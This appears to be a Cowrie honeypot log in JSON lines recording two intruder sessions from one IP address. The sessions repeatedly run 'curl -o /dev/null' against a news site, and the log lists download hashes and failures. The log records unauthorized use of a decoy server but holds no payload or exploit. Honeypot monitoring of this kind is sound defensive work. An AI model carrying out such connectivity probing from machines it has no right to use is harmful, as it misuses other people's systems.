{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.114120Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.117382Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.119019Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.120327Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.140743Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.147339Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.148223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.166397Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.171188Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.174241Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.175216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.193720Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.200327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.201687Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.205463Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.209545Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.214486Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.228652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.243999Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.245461Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.253355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.255116Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.289505Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.295666Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.296875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.302197Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.303352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.328105Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.341144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.349312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.350401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.355190Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.356849Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.358507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.359531Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.369480Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.372206Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.389220Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.390366Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.395056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.396010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.398691Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.428632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.429869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.432659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.433478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.460474Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.475056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.476166Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.480253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.481064Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.511121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.512344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.528865Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.533011Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.534739Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.541695Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.566299Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.569981Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.573671Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.575071Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.578644Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.582978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.584041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.586108Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.587925Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.590205Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.609005Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.610222Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.616078Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.619550Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.621324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.623818Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.632756Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.633648Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.643547Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.652087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.652818Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.664880Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.667682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.668939Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.673957Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
